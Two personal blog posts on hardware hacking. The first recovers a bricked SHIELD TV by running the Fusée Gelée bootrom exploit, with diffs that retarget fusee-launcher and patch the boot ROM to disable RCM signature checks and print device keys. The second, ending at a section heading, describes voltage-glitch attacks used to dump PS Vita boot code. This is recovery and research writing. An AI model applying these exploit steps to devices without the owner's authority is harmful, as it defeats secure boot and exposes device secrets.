Yifan Lu

Unbricking SHIELD TV (2015) with a Bootrom Exploit

2022-06-17T00:00:00-07:00

Last year, a friend gave me his SHIELD TV when he moved. He worked at NVIDIA and got it for free and had used it only a handful of times before it traveled from his closet to my own. I had forgotten about it until I had a need for a Raspberry Pi and discovered that they were all still sold out. Wouldn’t the SHIELD TV make a great RPI replacement? It has been out for almost a decade now and surely people have gotten Linux working on it. After following a guide from 2015, I quickly bricked the device trying to flash an outdated DTB file. It turns out that a bad DTB brick was quite common in the community and unfortunately the only proposed solution of “return it to Best Buy” was not an option for me. Even though I have never cared about this device, I was still ashamed at my negligence and felt guilty about creating more e-waste. Thus began my journey to recover the device.

Serial port

I needed to figure out why the device was not booting and a UART console usually provided diagnostics information. Some devices (such as the Kindle) even have recovery options available over the serial port. A quick probing of suspicious looking pads on the logic board yielded no results but luckily, people in the Linux thread have already found the pins. I was able to solder some wires to the pins and get a serial console.

Unfortunately, there was no recovery option available in the console but from the logs I was able to understand the reason why the SHIELD TV no longer booted. I flashed a DTB (device tree blob) designed for an older version of cboot. Therefore, when cboot tries to setup some device with the wrong configuration, it ends up in a dead-loop.

APX Mode

On Tegra devices, there is an emergency recovery option called APX mode. This is implemented in the boot ROM (so it can never be corrupted) and uses NVIDIA’s RCM protocol to communicate. According to some reverse engineering done by @ktemkin, there are three ways of entering APX mode:

The ROM fails to find a valid boot-loader.
Some GPIO is pulled to a particular value (e.g. holding some button combination while booting).
A scratch register is written to by software before rebooting.

Of these options, 1 is unavailable because the boot-loader is indeed valid (and signed) and the processor dies while already running that boot-loader. I spent some time with 2 by trying to short a random sampling of pads on the logic board while attempting to boot (with no luck). 3 is not an option because we need to run software. After chatting with famous Switch hacker @plutoo, he suggested I short out the eMMC while booting to force condition 1. This seemed like a promising route because I remember seeing some unfilled pads near the eMMC. I used a pin to short one of them to the shielding near it and saw the APX device show up on my computer. To make things less painful, I soldered a piece of wire to one of the pads and attached it to a pin I can easily ground.

At this point, you may wonder why I didn’t just re-flash the eMMC and the main reason is that I didn’t have the patience to find the correct signals (CMD/CLK/DAT0) and solder to those tiny pads all clumped up together (I also don’t own any micro/nano soldering equipment so I have to do everything with a standard tip iron). The second reason is that it would have made for a boring blog post 😅.

USB RCM

Getting into APX mode was the first step. NVIDIA designed the USB RCM protocol to only accept signed messages on production fused devices. The key is held by the device manufacturer, which means that only NVIDIA factories are allowed to unbrick the SHIELD TV. However, a few years ago, some researchers discovered a vulnerability in the boot ROM USB stack in the same Tegra X1 chip used in the SHIELD TV and used it to hack the Nintendo Switch. This vulnerability can be exploited to run arbitrary code in the boot processor. The Reswitched team has released a tool to exploit this vulnerability and some other people have since modified the tool to debrick older Tegra devices.

Putting it all together…

The plan is as follows:

Enter APX mode by grounding a random eMMC pin while powering on in order to force the boot-loader read to fail.
Use “Fusée Launcher” to launch a payload which patches out the RCM signature checks.
Use NVIDIA’s Linux4Tegra tools to flash the correct DTB over USB RCM.

Patching RCM security checks

The original “Fusée Launcher” did not work on my SHIELD TV likely due to some hard coded offset differences with the Nintendo Switch. Instead, I used the fork from @jevinskie for older Tegra devices which added an offset finder (leaked from dumping a stack frame). I patched in the original offsets for the X1:

diff --git a/fusee-launcher.py b/fusee-launcher.py
index 592bf4e..afbfa61 100755
--- a/fusee-launcher.py
+++ b/fusee-launcher.py
@@ -46,15 +46,15 @@ RCM_V4P_HEADER_SIZE = 680
 
 # The address where the RCM payload is placed.
 # This is fixed for most device.
-RCM_PAYLOAD_ADDR    = 0x4000A000
+RCM_PAYLOAD_ADDR    = 0x40010000
 
 # The address where the user payload is expected to begin.
-PAYLOAD_START_ADDR  = 0x4000AE40
+PAYLOAD_START_ADDR  = 0x40010E40
 
 # Specify the range of addresses where we should inject our
 # payload address.
-STACK_SPRAY_START   = 0x4000EE40
-STACK_SPRAY_END     = 0x40011000
+STACK_SPRAY_START   = 0x40014E40
+STACK_SPRAY_END     = 0x40017000
 
 class RCMError(Exception):
     def __init__(self, rcm_error_code):
@@ -467,8 +467,8 @@ class RCMHax:
     DEFAULT_PID = 0x7330
 
     # Exploit specifics
-    COPY_BUFFER_ADDRESSES   = [0x40003000, 0x40005000]   # The addresses of the DMA buffers we can trigger a copy _from_.
-    STACK_END               = 0x4000A000                 # The address just after the end of the device's stack.
+    COPY_BUFFER_ADDRESSES   = [0x40005000, 0x40009000]   # The addresses of the DMA buffers we can trigger a copy _from_.
+    STACK_END               = 0x40010000                 # The address just after the end of the device's stack.
 
     def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None, override_checks=False):
         """ Set up our RCM hack connection."""
@@ -725,7 +725,7 @@ with open("intermezzo_patched.bin", "wb") as f:
 # Prefix the image with an RCM command, so it winds up loaded into memory
 # at the right location (0x40010000).
 
-RCM_HEADER_SIZE = RCM_V1_HEADER_SIZE
+RCM_HEADER_SIZE = RCM_V4P_HEADER_SIZE
 
 # Use the maximum length accepted by RCM, so we can transmit as much payload as
 # we want; we'll take over before we get to the end.

Next, I downloaded @ktemkin’s non-secure RCM enable payload and put it in the same directory. I also made the following changes (the original patch did not cover some other code paths that checks the security fuse bit):

diff --git a/ipatch_rcm_sample.c b/ipatch_rcm_sample.c
index 491cb60..b797c2f 100644
--- a/ipatch_rcm_sample.c
+++ b/ipatch_rcm_sample.c
@@ -7,9 +7,13 @@
  */
 
 #include <stdint.h>
-#include "registers.h"
 #include "t210.h"
 
+#define _REG(base, off) *(volatile unsigned int *)((base) + (off))
+#define reg_write(base, off, value) _REG(base, off) = value
+#define reg_clear(base, off, value) _REG(base, off) &= ~value
+#define reg_set(base, off, value) _REG(base, off) |= value
+#define reg_read(base, off) _REG(base, off)
 
 #define HEX_CHAR(x) ((((x) + '0') > '9') ? ((x) + '7') : ((x) + '0'))
 
@@ -262,7 +266,7 @@ void unipatch_word(uint8_t slot)
 /**
  * Example exploit payload; printks the SBK and enables unsigned RCM.
  */
-void main()
+void __attribute__((section(".entry"))) main()
 {
   entry_point start;
   set_up_system();
@@ -271,8 +275,8 @@ void main()
   puts("Hello from the early X1 bootROM!\n");
   puts("Attempting to patch over the IROM itself.\n");
 
-  // Patch the getSecurityMode function to always return 3 (production non-secure).
-  ipatch_word(10, 0x102050, 0x2000 | DESIRED_SECURITY_MODE);
+  // Patch the get_fusebit_aec_2 function to always return 1
+  ipatch_word(10, 0x100286, 0xE003); // B 0xA
 
   // Jump into the recovery mode routine.
   puts("I'm going to go ahead and run RCM for you with security off. Have fun. :)\n");

Finally, I modified the Makefile in fusee-launcher to build the new payload:

diff --git a/Makefile b/Makefile
index 4f9a7df..ef34489 100644
--- a/Makefile
+++ b/Makefile
@@ -23,9 +23,9 @@ CFLAGS = \
 
 LDFLAGS =
 
-all: intermezzo.bin dump-sbk-via-usb.bin
+all: intermezzo.bin dump-sbk-via-usb.bin ipatch_rcm_sample.bin
 
-ENTRY_POINT_ADDRESS := 0x4000A000
+ENTRY_POINT_ADDRESS := 0x40010000
 
 # Provide the definitions used in the intermezzo stub.
 DEFINES := \
@@ -43,6 +43,12 @@ dump-sbk-via-usb.elf: dump-sbk-via-usb.o
 dump-sbk-via-usb.o: dump-sbk-via-usb.S
    $(CC) $(CFLAGS) $(DEFINES) $< -c -o $@
 
+ipatch_rcm_sample.elf: ipatch_rcm_sample.o
+   $(LD) -T ipatch_rcm_sample.lds --defsym LOAD_ADDR=$(ENTRY_POINT_ADDRESS) $(LDFLAGS) $^ -o $@
+
+ipatch_rcm_sample.o: ipatch_rcm_sample.c
+   $(CC) $(CFLAGS32) $(DEFINES) $< -c -o $@
+
 %.bin: %.elf
    $(OBJCOPY) -v -O binary $< $@
 
diff --git a/ipatch_rcm_sample.lds b/ipatch_rcm_sample.lds
new file mode 100644
index 0000000..2ac20f8
--- /dev/null
+++ b/ipatch_rcm_sample.lds
@@ -0,0 +1,22 @@
+OUTPUT_FORMAT("elf32-littlearm")
+OUTPUT_ARCH(arm)
+ENTRY(main)
+SECTIONS
+{
+   . = LOAD_ADDR;
+
+   .text : {
+       *(.entry)
+       *(.text)
+   }
+
+   /* always end on a word boundary for our copy */
+   . = ALIGN(4);
+
+   /DISCARD/ : { *(.dynstr*) }
+   /DISCARD/ : { *(.dynamic*) }
+   /DISCARD/ : { *(.plt*) }
+   /DISCARD/ : { *(.interp*) }
+   /DISCARD/ : { *(.gnu*) }
+   /DISCARD/ : { *(.data*) }
+}

Then make clean; make will build the payload and ./fusee-launcher.py -w -V 0x0955 -P 0x7721 ipatch_rcm_sample.bin will run it (after waiting for the APX device to show up). The serial port should print out:

Hello from the early X1 bootROM!                                                
Attempting to patch over the IROM itself.                                       
I'm going to go ahead and run RCM for you with security off. Have fun. :)       
For reference, your SBK+DK are: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Extracting the firmware

Next, I needed the stock firmware to recover to. Luckily, NVIDIA provides stock recovery images for the SHIELD TV. I downloaded the 9.0.0 recovery image for my SHIELD TV (2015) and extracted the .zip file. Next, I had to extract two files from blob which contains the boot-loaders and other data. Opening the file in a hex editor, we see the name of the partitions in ASCII listed in order. By guessing and checking I discovered the structure for each entry is something like:

struct blob_entry {
    char name[4];
    char unknown[36];
    uint32_t offset;
    uint32_t length;
    uint32_t unknown2;
};

I only care about two entries: EBT (the cboot boot-loader used by tegrarcm) and DTB (the partition I corrupted) so there was no need to write a script. I hand-extracted EBT as shield-9.0.0-cboot.bin and both DTB as shield-9.0.0-dtb1.bin and shield-9.0.0-dtb2.bin.

Using tegraflash.py

Next, I downloaded Linux for Tegra R24.2.3 driver package which contains the tegraflash.py tool. I placed the files I extracted from the firmware in /bootloader.

I first dumped the corrupted DTB:

$ ./tegraflash.py --bl shield-9.0.0-cboot.bin --applet nvtboot_recovery.bin --chip 0x21 --cmd "read DTB dtb-extracted.bin"
Welcome to Tegra Flash
version 1.0.0
Type ? or help for help and q or quit to exit
Use ! to execute system commands
 
[   0.0013 ] Generating RCM messages
[   0.0026 ] tegrarcm --listrcm rcm_list.xml --chip 0x21 --download rcm nvtboot_recovery.bin 0 0
[   0.0038 ] RCM 0 is saved as rcm_0.rcm
[   0.0049 ] RCM 1 is saved as rcm_1.rcm
[   0.0050 ] List of rcm files are saved in rcm_list.xml
[   0.0050 ] 
[   0.0050 ] Signing RCM messages
[   0.0060 ] tegrasign --key None --list rcm_list.xml --pubkeyhash pub_key.key
[   0.0070 ] Assuming zero filled SBK key
[   0.0111 ] 
[   0.0111 ] Copying signature to RCM mesages
[   0.0123 ] tegrarcm --chip 0x21 --updatesig rcm_list_signed.xml
[   0.0139 ] 
[   0.0140 ] Boot Rom communication
[   0.0149 ] tegrarcm --chip 0x21 --rcm rcm_list_signed.xml
[   0.0158 ] BR_CID: 0x32101001640ca58800000000030184c0
[   0.0167 ] RCM version 0X210001
[   0.0174 ] Boot Rom communication completed
[   1.0277 ] 
[   1.0278 ] Retrieving storage infomation
[   1.0287 ] tegrarcm --oem platformdetails storage storage_info.bin
[   1.0296 ] Applet version 00.01.0000
[   1.0363 ] Saved platform info in storage_info.bin
[   1.0866 ] 
[   1.0866 ] Reading BCT from device for further operations
[   1.0866 ] Sending bootloader and pre-requisite binaries
[   1.0880 ] tegrarcm --download ebt shield-9.0.0-cboot.bin 0 0
[   1.0893 ] Applet version 00.01.0000
[   1.0974 ] Sending ebt
[   1.0994 ] [................................................] 100%
[   1.4005 ] 
[   1.4018 ] tegrarcm --boot recovery
[   1.4028 ] Applet version 00.01.0000
[   1.4119 ] 
[   1.4120 ] Reading partition
[   1.4131 ] tegradevflash --read DTB /home/parallels/Downloads/Linux_for_Tegra_R24.2.3/bootloader/dtb-extracted.bin
[   1.4145 ] Cboot version 00.01.0000
[   2.0899 ] Reading partition DTB in file /home/parallels/Downloads/Linux_for_Tegra_R24.2.3/bootloader/dtb-extracted.bin
[   2.0907 ] [................................................] 100%
[   3.2296 ] 

Because the broken DTB I flashed was smaller than the working one, I was able to find the remaining bytes of the original DTB in the dump. I used this to match the bytes up to shield-9.0.0-dtb2.bin which I then flashed:

$ ./tegraflash.py --bl shield-9.0.0-cboot.bin --applet nvtboot_recovery.bin --chip 0x21 --cmd "write DTB shield-9.0.0-dtb2.bin"
Welcome to Tegra Flash
version 1.0.0
Type ? or help for help and q or quit to exit
Use ! to execute system commands
 
[   0.0016 ] Generating RCM messages
[   0.0030 ] tegrarcm --listrcm rcm_list.xml --chip 0x21 --download rcm nvtboot_recovery.bin 0 0
[   0.0043 ] RCM 0 is saved as rcm_0.rcm
[   0.0052 ] RCM 1 is saved as rcm_1.rcm
[   0.0052 ] List of rcm files are saved in rcm_list.xml
[   0.0052 ] 
[   0.0052 ] Signing RCM messages
[   0.0063 ] tegrasign --key None --list rcm_list.xml --pubkeyhash pub_key.key
[   0.0071 ] Assuming zero filled SBK key
[   0.0117 ] 
[   0.0117 ] Copying signature to RCM mesages
[   0.0131 ] tegrarcm --chip 0x21 --updatesig rcm_list_signed.xml
[   0.0147 ] 
[   0.0140 ] Boot Rom communication
[   0.0149 ] tegrarcm --chip 0x21 --rcm rcm_list_signed.xml
[   0.0158 ] BR_CID: 0x32101001640ca58800000000030184c0
[   0.0167 ] RCM version 0X210001
[   0.0174 ] Boot Rom communication completed
[   0.0613 ] 
[   0.0614 ] Sending bootloader and pre-requisite binaries
[   0.0626 ] tegrarcm --download ebt shield-9.0.0-cboot.bin 0 0
[   0.0635 ] Applet version 00.01.0000
[   0.0690 ] Sending ebt
[   0.0692 ] [................................................] 100%
[   0.4042 ] 
[   0.4054 ] tegrarcm --boot recovery
[   0.4064 ] Applet version 00.01.0000
[   0.4142 ] 
[   0.4143 ] Writing partition
[   0.4154 ] tegradevflash --write DTB /home/parallels/Downloads/Linux_for_Tegra_R24.2.3/bootloader/shield-9.0.0-dtb2.bin
[   0.4163 ] Cboot version 00.01.0000
[   1.0926 ] Writing partition DTB with /home/parallels/Downloads/Linux_for_Tegra_R24.2.3/bootloader/shield-9.0.0-dtb2.bin
[   1.0933 ] [................................................] 100%
[   1.1776 ] 

Here is the console output when flashing the DTB:

[0171.228] Enabled early print                                                  
[0171.231] [TegraBoot] (version 24.00.2015.42-mobile-5e019235)                  
[0171.237] Processing in recovery mode                                          
[0171.240] A02 Bootrom Patch rev = 31                                           
[0171.243] Power-up reason: pmc por                                             
[0171.247] Established communication link with host                             
[0174.689] Odmdata from BCT: 0x00294000                                         
[0174.693] DebugPort= 0x3                                                       
[0174.695] BoardId read from EEPROM/NCT: 2530                                   
[0174.723] max77620 set reest time to 0x00000078                                
[0174.728] Turned on fan for loki board                                         
[0174.731] Turning on Foster LED                                                
[0174.734] Checking BUTTON_VOL_UP Pin                                           
[0174.738] No Battery Present                                                   
[0174.740] RamCode = 2                                                          
[0174.743] Platform has Ddr4 type ram                                           
[0174.746] max77620 disabling SD1 Remote Sense                                  
[0174.750] Setting Ddr voltage to 1125mv                                        
[0174.754] Serial Number of Pmic Max77663: 0x2301a9                             
[0174.762] Entering ramdump check                                               
[0174.765] Get RamDumpCarveOut = 0xff280000                                     
[0174.769] RamDumpCarveOut=0xff280000,  RamDumperFlag=0x0                       
[0174.774] Last reboot was clean, booting normally!                             
[0174.779] Sdram initialization is successful                                   
[0174.783] SecureOs Carveout Base=0xff800000 Size=0x00800000                    
[0174.789] GSC1 Carveout Base=0xff700000 Size=0x00100000                        
[0174.794] GSC2 Carveout Base=0xff600000 Size=0x00100000                        
[0174.799] GSC3 Carveout Base=0xff500000 Size=0x00100000                        
[0174.804] GSC4 Carveout Base=0xff400000 Size=0x00100000                        
[0174.809] GSC5 Carveout Base=0xff300000 Size=0x00100000                        
[0174.814] BpmpFw Carveout Base=0xff2c0000 Size=0x00040000                      
[0174.820] Lp0 Carveout Base=0xff2bf000 Size=0x00001000                         
[0174.835] RamDump Carveout Base=0xff23f000 Size=0x00080000                     
[0174.841] Platform-DebugCarveout: 0                                            
[0174.963] Downloaded bootloader successfully at 0x92c00000                     
[0174.988] Using GPT Primary to query partitions                                
[0175.005] Bootloader DTB Load Address: 0xedfe0dd0                              
[0175.010] MAX77620_GPIO1 Configured.                                           
[0175.013] MAX77620_GPIO5 Configured.                                           
[0175.017] CPU power rail is up                                                 
[0175.020] CPU clock enabled                                                    
[0175.023] Performing RAM repair                                                
[0175.026] Updating A64 Warmreset Address to 0x92c002e9                         
[0175.033] Enable APE clock/reset                                               
[0175.036] Error in NvTbootGetTOSBinaryLength: 0x11 !                           
[0175.040] Loading Secure OS image failed.                                      
[0175.044] Set NvDecSticky Bits                                                 
[0175.048] GSC1 address : ff700000                                              
[0175.051] GSC2 address ff63fffc value c0edbbcc                                 
[0175.056] GSC2 address : ff600000                                              
[0175.060] GSC3 address : ff500000                                              
[0175.063] GSC4 address : ff400000                                              
[0175.067] GSC5 address : ff300000                                              
[0175.070] GSC MC Settings done                                                 
[0175.073] NvTbootPackSdramParams: start.                                       
[0175.078] NvTbootPackSdramParams: done.                                        
[0175.082] Next binary entry address: 0x92c00258                                
[0175.087] BoardId: 2530                                                        
[0175.111] NvTbootI2cProbe(): error code 0x00045100 Error while read            
[0175.117] Display board id is not available                                    
[0175.121] dram memory type is 3                                                
[0175.124] Tegraboot started after 175338183 us                                 
[0175.129] Basic modules init took 3854605 us                                   
[0175.133] USB data transfer took -179192788 us                                 
[0175.137] Validation of images took 179291610 us                               
[0175.142] Carveout took 1 us                                                   
[0175.144] CPU initialization took 36048 us                                     
[0175.148] Total time taken by TegraBoot 3989476 us                             
                                                                                
[0175.153] Starting CPU & Halting co-processor                                  
                                                                                
[0179.366]                                                                      
[0179.367] Debug Init done                                                      
[0179.370] Marked DTB cacheable                                                 
[0179.373] Bootloader DTB loaded at 0x83000000                                  
[0179.377] DeviceTree Init done                                                 
[0179.390] Pinmux applied successfully                                          
[0179.395] gicd_base: 0x50041000                                                
[0179.399] gicc_base: 0x50042000                                                
[0179.402] Interrupts Init done                                                 
[0179.407] Using base:0x60005008 & irq:33 for tick-timer                        
[0179.412] Using base:0x60005000 for delay-timer                                
[0179.416] platform_init_timer: DONE                                            
[0179.420] Timer(tick) Init done                                                
[0179.424] osc freq = 38400 khz                                                 
[0179.429]                                                                      
[0179.430] welcome to cboot                                                     
[0179.432]                                                                      
[0179.433] Cboot Version: 24.00.2015.42-t210-236e8a1e                           
[0179.438] calling constructors                                                 
[0179.441] initializing heap                                                    
[0179.444] initializing threads                                                 
[0179.447] initializing timers                                                  
[0179.450] creating bootstrap completion thread                                 
[0179.454] top of bootstrap2()                                                  
[0179.457] CPU: ARM Cortex A57                                                  
[0179.460] CPU: MIDR: 0x411FD071, MPIDR: 0x80000000                             
[0179.465] initializing platform                                                
[0179.510] config for ddr50 mode completed                                      
[0179.514] sdmmc bdev is already initialized                                    
[0179.518] of_register: registering tegra_udc to of_hal                         
[0179.523] of_register: registering inv20628-driver to of_hal                   
[0179.529] of_register: registering ads1015-driver to of_hal                    
[0179.534] of_register: registering lp8557-bl-driver to of_hal                  
[0179.540] of_register: registering bq2419x_charger to of_hal                   
[0179.546] of_register: registering cpc to of_hal                               
[0179.550] of_register: registering bq27441_fuel_gauge to of_hal                
[0179.565] gpio framework initialized                                           
[0179.569] of_register: registering tca9539_gpio to of_hal                      
[0179.574] of_register: registering tca9539_gpio to of_hal                      
[0179.580] of_register: registering i2c_bus_driver to of_hal                    
[0179.585] of_register: registering i2c_bus_driver to of_hal                    
[0179.591] of_register: registering i2c_bus_driver to of_hal                    
[0179.596] pmic framework initialized                                           
[0179.600] of_register: registering max77620_pmic to of_hal                     
[0179.605] regulator framework initialized                                      
[0179.609] of_register: registering tps65132_bl_driver to of_hal                
[0179.615] of_register: registering tegra_xhci to of_hal                        
[0179.620] initializing target                                                  
[0179.627] gpio_driver_register: register 'tegra_gpio_driver' driver            
[0179.637] fixed regulator driver initialized                                   
[0179.678] initializing OF layer                                                
[0179.682] of_children_init: Ops found for compatible string nvidia,tegra210-xhi
[0179.690] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.712] I2C Bus Init done                                                    
[0179.714] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.727] I2C Bus Init done                                                    
[0179.730] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.742] I2C Bus Init done                                                    
[0179.745] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.758] I2C Bus Init done                                                    
[0179.761] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.773] I2C Bus Init done                                                    
[0179.776] of_children_init: Ops found for compatible string maxim,max77620     
[0179.789] max77620_init using irq 118                                          
[0179.794] register 'maxim,max77620' pmic                                       
[0179.798] gpio_driver_register: register 'max77620-gpio' driver                
[0179.804] of_children_init: Ops found for compatible string nvidia,tegra210-i2c
[0179.817] I2C Bus Init done                                                    
[0179.821] calling apps_init()                                                  
[0179.834] Found 29 GPT partitions in "sdmmc3_user"                             
[0179.839] Proceeding to flashing Server                                        
[0179.843] usbdcd_reinit Initialize driver to use already enumerated device     
[0179.850] nv3p_priv_usbf_open USB configuration success                        
[0179.859] Writing DTB partition                                                
[0179.862] bct_init bctinit                                                     
[0179.874] bct_init bctinit                                                     
[0179.877] bct_init bctinit                                                     
[0179.938] partition DTB write successful.

With that, I was able to recover successfully and boot back into fastboot and Android TV. (The first time in my life I was happy to see the Android logo.)

Some other notes for anyone who wishes to attempt this:

With the eMMC pin I randomly picked to short, it takes about 100 seconds to get into APX mode (likely due to some retry timeout or watchdog routine). A different pin made the transition instant but was harder to solder.
When running tegrarcm --chip 0x21 --rcm rcm_list_signed.xml, if you get RCM version 0X210001 that means the ipatch was successful. If you get RCM version 0X13, that’s actually an error code for invalid public key (the ipatch failed or you didn’t run it). If you get no RCM version and Boot Rom communication failed, you need to retry. I’m not exactly sure why sometime it ends up in Boot Rom communication failed but the patch isn’t perfect.
You may have to restart after executing any command.
Trying to use the cboot.bin included in the L4T drivers package fails to boot.
Thanks to @adeljck for the Tegra X1 bootrom dump and IDC file which means I didn’t have to RE any code myself.

Glitching a $20k Piece of History

2019-08-16T00:00:00-07:00

A few months ago, a contact reached out to me with an irresistible offer. I would be given the opportunity to experiment with an insanely rare, prototype development kit PlayStation Vita. The only ask from my source is that I somehow dump the boot code. I’ve spent the last seven years hacking every last bit of the Vita from exploiting the kernel to extracting hardware keys with AES fault injections. In that long journey, I’ve gotten intimate with every model and revision of the Vita so it seems inevitable that I would find myself with the very first prototype. The DEM-3000L is actually more rare than the DEM-3000H that recently made headlines having been sold for $20,000. Although I cannot confirm this independently, my source claims that the DEM-3000H units were distributed to early game developers while the DEM-3000L was used internally at Sony to develop the system firmware. The history of this particular DEM-3000L was that two of these were originally found side by side at a Chinese landfill. They had extensive water damage (I was told they were “at the bottom of a lake”) and was carefully repaired. One of the two (the one with the broken display) eventually made it to me.

I’ve been asked countless times: why dump the boot code? Especially on such a one-of-a-kind system? My first answer is that it’s because dumping the boot code is difficult and I never turn down an opportunity to flex on Twitter by posting cryptic hashes. My other answer is that in terms of preservation, there is historical value in attempting to extract as much data as possible out of this system before it deteriorates any farther. The Vita is a unique piece of hardware because everything is custom designed–from the hardware to the operating system to the executable formats. We’ve been obsessively documenting every tiny detail of this handheld console that was never the commercial hit that Sony wanted and anything that even adds a small drop of additional knowledge is worth it for me.

Previously on Vita glitching…

If you followed the Vita hacking scene, you might remember my foyer into hardware hacking by voltage glitching. I even wrote a paper documenting the whole procedure in academic (read: boring) detail. For the majority of you, here is a summary of what was needed to dump the boot code from a retail Vita. Recall that a glitch attack is simply a way to abuse transistor responses to extreme changes in the operating environment in order to cause the hardware to make “mistakes” in computation such as skipping or corrupting instructions being executed.

First serving

Initially, we had minimal knowledge about how the bootrom worked. We knew that it somehow loaded the bootloader (in a format called SLSK) from the eMMC, then parsed the bootloader header, checked the integrity/signatures, and finally jumped to the bootloader (after making sure bootrom code is no longer accessible). Every other documented software glitch attack either assumes that the attacker already has complete access to the code being executed or full understanding of how data is processed and can therefore device highly targeted glitches to bypass a certain check. For us, the story is more complicated. We cannot target a glitch on the signature check, for example, because we do not know when the signature check happens. Due to a bug in how Sony implemented the eMMC driver, 99% of the time spent in boot is waiting for the eMMC operation to complete, which makes the search space practically infeasible for blindly glitching and hoping to hit the right point. We did not have the public key to decrypt the signature nor did we have the encryption keys to decrypt the header (plus we did not even know where the signature resided in the file as it was mostly encrypted data).

To recast this problem in a more generic setting, we have to overcome two challenges in order to make use of a glitch attack to exploit software.

We need an observable metric for success. How do you know if your glitch succeeded in changing the program behaviour? If you’re targeting a signature check bypass then it’s easy enough: wait for your code to be executed. But what if it fails? We can only pick glitch targets where success of the glitch can be measured independently from the success of the overall attack. If you have one condition for success and a dozen conditions for failure, then after days of glitching with different offsets and widths you end up learning nothing about the feasibility of your attack because any failure can be due to any reason.
We need to be able to narrow down the search space for glitch parameters. The two parameters that makes the most impact in a crowbar voltage glitch are the offset (when the glitch is triggered) and the width (how long is the glitch). If the search space is too large, the turnaround time for experimentation would be days. In theory that is not too bad but in practice you’ll quickly lose morale when you see that multiple days passed and you have no idea if you’re even getting close.

The insight that we came up with eventually was that there appears to be a max size of the SLSK that is allowed. If the size is too large, the boot code refuses to load anything and panics. That size check was a great target because if we monitor the eMMC traffic, we can observe success by seeing the bootloader being read even though the size was too large. Since we know that the size check can only happen after the eMMC block containing the size field is read, we can set the glitch to trigger at some time offset after we observe that block being read. Additionally, if there is a size check, that usually means there is a buffer with a maximum size and if we bypass the check, we can overflow this buffer.

This plan worked and we discovered the buffer that we managed to overflow is actually adjacent to the code currently being executed so achieving code execution quickly followed.

But that was the end of the good news. We also discovered that there is no boot “rom” in the traditional sense. Instead what happens is that upon reset, some unknown hardware agent pre-loads the beginning of the SRAM with the boot code. Then the boot code copies itself to the end of the SRAM and jumps to it. At that point, the start of the SRAM becomes scratch space for the SLSK loading and that is why overflowing the buffer allows us to overwrite the currently running code. There is no evidence that the source for the initial boot code is ever mapped in memory so there’s no hope of getting it through software. Because our means of code execution requires overwriting this boot”ram”, we overwrite a lot of the code we are interested in. Even worse, the code was designed to wipe any secret from the SRAM as soon as it is used so we cannot dump those either even though they are not overwritten.

Second serving

Not all hope is lost though as we quickly discovered a second target after reverse engineering the code we got. As now documented on the wiki, Sony decided to re-use the start of the SRAM as a scratch buffer for loading the SLSK. Previously we overflowed this buffer in order to overwrite the adjacent code. Now we notice that the MeP processor has the exception vectors set to this same SRAM location and there is no way to turn off exceptions. Normally, Sony is safe because the only ways to trigger an exception aside from hardware signals are special instructions (software interrupts, debug breakpoints, etc) and divide by zero. The two times division is done in boot code is with a constant non-zero divisor and the special instructions are not found at all.

But with a glitch attack, it is easy to corrupt an instruction to hit one of these exceptions (the reserved instruction can be triggered especially easily with a glitch). In our second attack, we replace the first block of the SLSK bootloader with an exception vector that jumps into our payload. We trigger a glitch after the block is loaded and cause an exception. This works surprisingly well and much better than our original size-field attack because it doesn’t depend on a precise glitch on a single instruction. Instead, we can spray-and-pray random glitches with knowledge that any random instruction corruption will likely trigger the reserved instruction exception.

Most of the boot code was dumped this way, but since the block size of eMMC is 512 bytes, we still have to overwrite the first 512 bytes which destroys most of the initial startup code. Can we do even better?

Third serving

Turns out there is a very esoteric feature in Vita’s secure boot that we still do not fully understand the purpose of. second_loader.enp is the SLSK which is responsible for starting the ARM (main application) cores. Once ARM boots up, it locates and reads secure_kernel.enp from the eMMC and then does a handshake with F00D (the boot processor) to reset the core, which re-copies and re-starts the boot code. After reset F00D boot code loads secure_kernel.enp from the memory instead of second_loader.enp directly from the eMMC. secure_kernel.enp provides cryptographic services to the ARM processor.

Although this roundabout boot process is mysterious, we do not need to understand why it exists in order to exploit it. Recall in this alternative boot code path, the SLSK is copied directly from memory instead of read from eMMC (in 512 byte blocks). It copies 64 bytes of the SLSK file, verifies the header, and loads the rest of the file if the header check passes. If the check fails, it does not wipe the data so in effect we are still able to overwrite the exception vectors. This yields the following complicated procedure to get the remaining 448 bytes:

Boot the Vita up normally using the HENkaku Ensō CFW to get kernel code execution.
Privilege escalate to ARM TrustZone using a separate exploit.
Pwn F00D with a third exploit in order to perform the reset handshake with TrustZone. This handshake requires both F00D code execution and ARM TrustZone code execution to pull off.
Load the exception vector payload in TrustZone and trigger the glitcher with a sequence of characters written to UART console.
After some time offset, the glitch happens and causes an exception in F00D which runs the payload.

So with 3 software vulnerabilities and a hardware glitcher, we can finally get 16320/16384 bytes of the boot code. The remaining 64 bytes? Turns out it is just the (original) exception table which is the same entry (to a panic) repeated 15 times. We also guess the reset vector (0x0) points to the only boot code in the system 😀.

Prototype glitching

Previously I bought a box of Vita motherboards to experiment on. I was able to make PCB modifications and do wild things that quickly killed the boards (such as accidentally shorting CORE_VDD to any other voltage source). With this rare prototype unit, we have to be more careful and so we cannot reproduce the exact same setup. For one, the retail Vita had the main SoC and the eMMC side by side so the wires between the two are relatively long and so Sony had to route in a couple of resistors for signal integrity. The way we probed the eMMC (both for recovering from bad payload flashes as well as for triggering the glitches) required soldering wires to these tiny resistors. On the DEM, the eMMC lies directly underneath the SoC on the opposite side of the board with the wires going through the board instead of across, making the signals impossible to probe. Secondly, there is a widely held belief that removing decoupling capacitors on the board will improve glitch success. At this point, I have not seen any convincing evidence that removing decoupling capacitors actually makes a difference for crowbar voltage glitching and it feels like cargo-culting to me. Therefore I make no attempt to find and remove decoupling capacitors. Finally, to replace the eMMC packet trigger, I decided to re-purpose an on-board debug LED because it was easy to control via software and because it seems least likely to make an impact if it was accidentally destroyed.

Narrowing the parameter search

